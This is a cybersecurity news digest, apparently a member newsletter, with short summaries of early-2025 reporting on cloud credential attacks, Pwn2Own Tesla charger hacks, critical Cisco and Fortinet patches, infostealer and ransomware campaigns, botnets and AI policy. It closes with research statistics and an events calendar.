Information Security News
Google Cloud Links Poor Credentials to Nearly Half of All Cloud-Based Attacks
By Matt Kapko, Cybersecurity Dive
Read more
Google Cloud has reported that nearly half of all cloud-based cyberattacks can be traced back to weak or compromised credentials. Attackers frequently exploit poor password hygiene and misconfigured access controls to infiltrate cloud environments, leading to data breaches and system disruptions. Security experts recommend enforcing multi-factor authentication, rotating credentials regularly, and conducting periodic audits to identify potential weaknesses. The findings underscore the critical need for robust identity and access management practices to secure cloud infrastructures.
Tesla EV Charger Hacked Twice on Second Day of Pwn2Own Tokyo
By Sergiu Gatlan, Bleeping Computer
Read more
Security researchers at Pwn2Own Tokyo successfully hacked Tesla’s EV charger twice in a single day, exposing vulnerabilities that could allow attackers to manipulate charging operations or access connected networks. The flaws, discovered through ethical hacking efforts, highlight the cybersecurity challenges in the rapidly growing EV ecosystem. Tesla has been informed and is expected to release patches to address these issues. This incident underscores the importance of continuous testing and proactive security measures for smart infrastructure.
Patch Now: Cisco Fixes Critical 9.9-Rated, Make-Me-Admin Bug
By Jessica Lyons, The Register
Read more
Cisco has released a critical patch for a vulnerability rated 9.9/10, which could allow attackers to escalate privileges and gain administrative control over affected systems. The flaw, found in the Web UI of multiple Cisco products, poses a severe risk to enterprises that delay patching. Security experts urge organisations to apply the update immediately to prevent potential exploitation. This incident serves as another reminder of the risks posed by unpatched vulnerabilities and the importance of timely updates in enterprise environments.
Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks
By Ravie Lakshmanan, The Hacker News
Read more
Cybercriminals are using fake CAPTCHA verification pages to distribute the Lumma Stealer malware, targeting industries ranging from finance to healthcare. This sophisticated phishing campaign tricks users into downloading the malware, which is designed to steal credentials, financial information, and browser data. Researchers warn that the campaign is gaining traction globally, urging organisations to enhance user awareness and deploy endpoint protection solutions to combat evolving social engineering tactics.
Cloudflare CDN Bug Outs User Locations on Signal, Discord
By Elizabeth Montalbano, Dark Reading
Read more
A Cloudflare content delivery network (CDN) bug has inadvertently exposed user locations on popular platforms such as Signal and Discord. The vulnerability, which allowed attackers to determine the approximate physical location of users, has raised concerns over privacy and data security. Cloudflare has since patched the issue, but the incident highlights the growing risks of relying on third-party services for critical infrastructure. Users are advised to remain vigilant and review privacy settings to minimise exposure.
FBI: North Korean IT Workers Steal Source Code to Extort Employers
By Sergiu Gatlan, Bleeping Computer
Read more
The FBI has uncovered a scheme where North Korean IT workers, posing as remote contractors, infiltrated companies and stole proprietary source code to extort their employers. These operatives, often working under false identities, gained access to critical systems, demanding ransom payments to prevent data leaks. The campaign highlights the growing threat of insider attacks and the importance of thorough background checks and access controls. Organisations are urged to monitor remote employees carefully to prevent such exploits.
New Backdoor Discovered That Specifically Targets Juniper Routers
By Greg Otto, Cyberscoop
Read more
Researchers have identified a new backdoor targeting Juniper routers, enabling attackers to gain persistent access to enterprise networks. The malware exploits misconfigurations and outdated firmware, allowing cybercriminals to intercept traffic, steal credentials, and move laterally across systems. Security experts stress the importance of timely firmware updates, network segmentation, and continuous monitoring to detect and block potential intrusions. Organisations using Juniper devices are urged to conduct immediate security assessments.
LinkedIn Sued for Disclosing Customer Information to Train AI Models
By Jonathan Stempel, itNews
Read more
LinkedIn is facing a lawsuit over allegations that it disclosed user data without consent to train artificial intelligence models. Plaintiffs argue that the platform harvested personal information from millions of users to improve AI-driven services, violating privacy rights and data protection laws. The case highlights the growing tension between AI innovation and user privacy, with regulators closely watching the outcome. LinkedIn has denied wrongdoing, but the lawsuit raises concerns about ethical data practices in the AI age.
Crossbenchers Urge Labor to Act Immediately on Deepfakes and Misinformation Before Next Election
By Krishani Dhanji, The Guardian
Read more
Australian crossbench politicians are pressuring the government to implement stricter regulations against deepfakes and misinformation ahead of the next federal election. Lawmakers warn that the rapid spread of AI-generated disinformation could undermine public trust and election integrity. Recommendations include tighter platform regulations, public awareness campaigns, and enhanced fact-checking capabilities. With global elections approaching, the call for immediate action reflects growing concerns over the potential misuse of emerging technologies in shaping public opinion.
EU Commission Calls for Health Sector ‘Cyber Action Plan’
By Marianne Kolbasuk McGee, ISMG Data Breach Today
Read more
The European Commission has urged the healthcare sector to adopt a comprehensive cyber action plan to address the growing threat landscape. With cyberattacks targeting hospitals and medical institutions on the rise, the plan calls for improved incident response, enhanced threat intelligence sharing, and stricter compliance with cybersecurity regulations. The Commission highlights the critical nature of securing healthcare data and infrastructure to protect patient safety and operational continuity.
President Trump Scraps Biden’s AI Safety Executive Order
By Rashmi Ramesh, ISMG Info Risk Today
Read more
US President Trump has announced plans to repeal President Biden’s executive order on AI safety, citing concerns that it stifles innovation and imposes excessive regulatory burdens. The original order aimed to establish guidelines for ethical AI use and development, focusing on mitigating risks related to bias, security, and accountability. Critics argue that rolling back these measures could weaken efforts to ensure responsible AI deployment. The debate highlights the ongoing tension between regulation and innovation in the rapidly evolving AI landscape.
DHS Disbands Existing Advisory Board Memberships, Raising Questions About CSRB
By David Jones, Cybersecurity Dive
Read more
The U.S. Department of Homeland Security has unexpectedly disbanded its advisory board memberships, raising concerns about the future of the Cyber Safety Review Board (CSRB). The move has sparked speculation about potential restructuring and its impact on ongoing cybersecurity initiatives. Industry experts worry that the decision could hinder collaboration between the public and private sectors in addressing cyber threats. DHS officials have assured stakeholders that new appointments will be made, but the shake-up has left many questioning the board’s continuity and long-term strategic direction.
PowerSchool Theft Latest: Decades of Canadian Student Records, Data from 40-Plus US States Feared Stolen
By Iain Thomson, The Register
Read more
A massive data breach involving PowerSchool, a widely used education technology platform, has potentially exposed decades of student records from Canada and over 40 U.S. states. The compromised data includes personal information, academic records, and possibly financial details, raising serious privacy concerns. Authorities are investigating the breach, and affected institutions are urged to enhance their security measures. This incident highlights the vulnerability of educational data and the need for stricter data protection policies.
Ransomware Groups Pose as Fake Tech Support Over Teams
By Derek B. Johnson, Cyberscoop
Read more
Cybercriminals are impersonating IT support staff on Microsoft Teams to trick employees into installing ransomware. This social engineering tactic leverages the trust employees place in internal support channels, allowing attackers to deploy malware with minimal suspicion. Security experts recommend organisations implement stricter verification processes and employee training to recognise fraudulent communications. The campaign underscores the increasing sophistication of ransomware operators and the need for multi-layered security approaches.
Trump Fires Cyber Safety Board Investigating Salt Typhoon Hackers
By Becky Bracken, Dark Reading
Read more
US President Trump has reportedly dismissed members of the Cyber Safety Review Board (CSRB) tasked with investigating the Salt Typhoon cyberattacks, raising concerns over the future of cybersecurity governance. The board was analysing the long-term implications of the sophisticated campaign attributed to nation-state actors. Critics argue that the move disrupts critical investigations and weakens national cybersecurity initiatives. The decision has sparked debate over balancing government oversight with independent cybersecurity assessments.
Fake Homebrew Google Ads Target Mac Users With Malware
By Bill Toulas, Bleeping Computer
Read more
Cybercriminals are using fake Google ads promoting Homebrew, a popular package manager for macOS, to distribute malware targeting unsuspecting users. The deceptive ads lead to malicious sites that trick users into downloading trojanised installers, compromising their systems. Experts warn Mac users to verify download sources and rely on official websites to avoid falling victim to such scams. This campaign highlights the growing trend of threat actors leveraging trusted software names to distribute malware.
Patch Procrastination Leaves 50,000 Fortinet Firewalls Vulnerable to Zero-Day
By Connor Jones, The Register
Read more
Despite warnings, over 50,000 Fortinet firewalls remain unpatched and vulnerable to a critical zero-day exploit that attackers are actively exploiting. The vulnerability allows remote code execution, potentially granting cybercriminals access to sensitive data and internal networks. Security experts emphasise the urgency of applying patches to prevent compromise. This incident highlights the persistent challenge of patch management and the risks organisations face when critical vulnerabilities are left unaddressed.
Mirai Botnet Spinoffs Unleash Global Wave of DDoS Attacks
By Elizabeth Montalbano, Dark Reading
Read more
Variants of the infamous Mirai botnet are behind a recent surge in distributed denial-of-service (DDoS) attacks targeting businesses and critical infrastructure worldwide. The spinoffs exploit vulnerable IoT devices, amplifying their reach and impact. Researchers warn that threat actors are refining their tactics, making detection and mitigation increasingly challenging. Organisations are urged to secure IoT deployments and implement robust traffic filtering solutions to mitigate the threat. The attacks serve as a stark reminder of the persistent risks posed by insecure connected devices.
Ransomware Gangs Pose as IT Support in Microsoft Teams Phishing Attacks
By Bill Toulas, Bleeping Computer
Read more
Cybercriminals are masquerading as IT support staff in Microsoft Teams chats to trick employees into installing ransomware. Using social engineering tactics, attackers convince users to download malicious files, gaining access to corporate networks. The scheme exploits the trust employees place in internal communication tools. Security experts recommend implementing multi-factor authentication, conducting awareness training, and enabling strict access controls to mitigate the risk. The attack highlights the evolving sophistication of ransomware operations.
13,000 MikroTik Routers Hijacked by Botnet for Malspam and Cyberattacks
By Ravie Lakshmanan, The Hacker News
Read more
Cybercriminals have hijacked 13,000 MikroTik routers to create a botnet used in widespread malspam and cyberattacks. The compromised routers are being leveraged to distribute malware, launch phishing campaigns, and perform reconnaissance on targeted networks. Researchers have identified vulnerabilities in outdated router firmware as the primary entry point for attackers. MikroTik users are urged to apply firmware updates, change default credentials, and monitor traffic for unusual activity. This incident underscores the risks of unsecured IoT devices being weaponised by threat actors.
Analysis
Ukraine’s State Register Restored After Russian Cyber Attack
By David Hollingworth, Cyberdaily.au
Read more
Ukrainian officials have successfully restored the country’s state register following a disruptive cyberattack attributed to Russian-backed hackers. The attack, which targeted critical government databases, temporarily crippled access to key public services. Authorities have reinforced security measures to prevent further incidents and are investigating the methods used by attackers. This incident highlights the ongoing cyber conflict between Ukraine and Russia, emphasising the importance of resilience and robust cybersecurity strategies for national infrastructure.
EU to Take Aim at Healthcare Cyber Threat
By Karin Lindström, CSO
Read more
The European Union is set to introduce new measures to tackle the growing cybersecurity threats facing the healthcare sector. With a rising number of attacks targeting hospitals and healthcare providers, the initiative aims to establish stronger compliance frameworks, enhance data protection, and improve incident response capabilities. Healthcare organisations are urged to adopt robust cybersecurity measures to safeguard sensitive patient data and ensure continuity of care. The initiative reflects the EU’s commitment to strengthening the security posture of critical sectors.
Cybersecurity a Key Concern Ahead of Australia’s 2025 Federal Election
By David Hollingworth, Cyberdaily
Read more
With Australia’s 2025 federal election approaching, cybersecurity experts are raising alarms about the potential for cyber threats to disrupt the democratic process. Concerns include misinformation campaigns, deepfake technology, and potential attacks on election infrastructure. Lawmakers and cybersecurity agencies are working to strengthen defences, enhance public awareness, and implement regulatory measures to counter these risks. The government is urged to act swiftly to protect voter confidence and ensure election integrity in the face of evolving cyber threats.
CERT-UA Warns of Cyber Scams Using Fake AnyDesk Requests for Fraudulent Security Audits
By Ravie Lakshmanan, The Hacker News
Read more
Ukraine’s cybersecurity agency CERT-UA has issued a warning about a new scam campaign using fake AnyDesk remote access requests to trick users into fraudulent security audits. Threat actors impersonate legitimate IT professionals to gain control over victims’ systems, stealing sensitive data or deploying malware. Businesses and individuals are urged to verify all unsolicited audit requests and implement stricter access controls. This campaign highlights the ongoing reliance on social engineering tactics to exploit trust and infiltrate systems.
HPE is Investigating IntelBroker’s Claims of the Company Hack
By Pierluigi Paganini, Security Affairs
Read more
Hewlett Packard Enterprise (HPE) is investigating claims made by the cybercriminal group IntelBroker, who allege they have breached HPE’s internal systems and accessed sensitive corporate data. The company has engaged cybersecurity experts to assess the legitimacy of the claims and identify potential vulnerabilities. If confirmed, this breach could have significant implications for HPE’s operations and customer trust. The incident underscores the persistent threats faced by large corporations and the importance of robust cybersecurity frameworks to prevent unauthorised access.
The Technological Poison Pill: How ATProtocol Encourages Competition, Resists Evil Billionaires, Lock-In & Enshittification
By Mike Masnick, Tech Dirt
Read more
The ATProtocol, designed to decentralise social media and foster competition, presents a compelling solution to the monopolisation of online platforms. This analysis explores how the protocol can combat corporate lock-in, safeguard user data, and resist platform manipulation by powerful interests. While the protocol offers promising solutions, challenges such as adoption hurdles and interoperability remain. The article argues that open, decentralised systems could reshape the digital landscape, providing users with greater control over their online presence.
The Security Risk of Rampant Shadow AI
By Anuj Jaiswal, Dark Reading
Read more
Shadow AI—the unregulated use of artificial intelligence tools within organisations—poses significant security risks, as employees adopt AI solutions without proper oversight. This lack of visibility can lead to data leaks, compliance violations, and vulnerabilities introduced by untested models. The article explores strategies to mitigate these risks, including clear AI governance frameworks, employee training, and continuous monitoring. As AI adoption accelerates, organisations must prioritise security to prevent unintended exposure and potential breaches.
Salt Typhoon: The Other Shoe Has Dropped, but Consternation Continues
By Natto Thoughts, Substack
Read more
The Salt Typhoon cyber espionage campaign continues to raise concerns as new revelations emerge about the depth and scale of the attack. Security experts are scrambling to understand the full extent of data exfiltration and the potential geopolitical implications. This analysis delves into the latest findings and outlines proactive steps organisations can take to strengthen defences against sophisticated nation-state attacks. The article highlights the need for improved threat intelligence sharing and robust incident response planning.
AI and Cybersecurity: A Double-Edged Sword
By Aaron Momin, CIO
Read more
AI is revolutionising cybersecurity by enhancing threat detection and automating responses, but it also introduces new risks that attackers can exploit. This article explores how AI-driven solutions can improve incident response and detection while highlighting the dangers of adversarial AI techniques used to bypass security measures. Organisations must strike a balance between leveraging AI for protection and mitigating its potential misuse. The piece provides practical insights into integrating AI while maintaining a strong human oversight component.
Medusa Ransomware: What You Need To Know
By Graham Cluley, Tripwire
Read more
The Medusa ransomware group has emerged as a formidable threat, targeting businesses and critical infrastructure with sophisticated attacks. Known for encrypting files and demanding steep ransoms, the group has also adopted a double-extortion tactic—leaking stolen data if payments are not made. Security experts advise organisations to strengthen backup strategies, implement multi-layered defences, and conduct regular employee training to mitigate the risk. With ransomware tactics evolving rapidly, businesses must remain vigilant against these persistent threats.
Statistics & Insights
Cyber Market Enters 2025 with Buyer-Friendly Trends – Gallagher
By Kenneth Araullo, Insurance Business
Read more
The cybersecurity insurance market is entering 2025 with trends favouring buyers, as increased competition among insurers drives down premiums and expands coverage options. Companies are now able to negotiate better terms, but insurers are also tightening underwriting standards to ensure policyholders maintain strong security postures. This analysis highlights the evolving risk landscape, emphasising the need for businesses to align their cybersecurity efforts with insurance expectations to secure optimal coverage.
Ransomware, Organisations, Utilities, and Governments
By PrivID, Substack
Read more
Ransomware continues to be a major threat to organisations, utilities, and government entities, with attacks becoming more sophisticated and targeted. This analysis explores how ransomware groups are evolving their tactics, including double extortion and supply chain attacks, putting critical infrastructure at heightened risk. The piece provides actionable insights on how organisations can bolster their defences through proactive risk management, incident response planning, and collaboration with law enforcement agencies to mitigate potential disruptions.
Cyber Insights 2025: Attack Surface Management
By Kevin Townsend, Security Week
Read more
As cyber threats grow in complexity, attack surface management (ASM) is becoming a crucial strategy for organisations to identify and reduce potential entry points for attackers. This analysis examines how ASM tools provide real-time visibility into assets, vulnerabilities, and misconfigurations, helping businesses stay one step ahead of threat actors. With the rapid expansion of cloud services and IoT devices, the need for a proactive, continuous approach to attack surface monitoring has never been greater.
Highlights from Last Week’s Cybersecurity Research Sources by Evisec – CRD #15
Powered by Evisec
Read more
Highlights from the latest cybersecurity research:
- Cyber Dominates Global Risk Rankings: 38% of global risk managers rank cybersecurity as their top organisational risk, ahead of supply chain interruptions (31%) and natural catastrophes (29%).
- Resilience Gap Widens: Small organisations report a sevenfold increase in perceived resilience insufficiency since 2022, while large organisations halve theirs.
- Ransomware Trends Shift: Healthcare is now the second most targeted sector as ransom tactics pivot to data exfiltration. Median ransom payments in 2024 held at $200,000.
- Infostealers on the Rise: Breach attempts involving infostealer malware surged 58% in 2024, with stolen credentials linked to most breaches.
- Workplace Fear Culture: 73% of employees feel personally accountable for breaches, with 36% avoiding reporting due to fear of repercussions.
Of Interest
AI Trust and Safety Re-Imagining Programme
Global Call for Submissions – UNDP
Read more
The UNDP is calling for submissions on how to re-imagine trust and safety in the age of AI. This programme aims to address the challenges posed by AI-driven technologies and develop innovative solutions to ensure ethical and responsible use.
CyAN Member’s News
Upcoming CyAN Global Events
- AI Global Everything – Dubai, UAE (February 4–6)
Learn more - GITEX Africa – Marrakesh, Morocco (April 14–16)
Learn more - GITEX Asia – Singapore, Marina Bay Sands (April 23–25)
Learn more - GISEC – Dubai World Trade Center, Dubai, UAE (May 6–8)
Learn more - The Cyber Outstanding Security Performance Awards (Cyber OSPAs) – London, UK (May 8)
Learn more - MaTeCC – Rabat, Morocco (June 7–9, 2025)
The third annual North Africa and Beyond cybersecurity event, hosted by CyAN partner organisation École High-Tech.
Learn more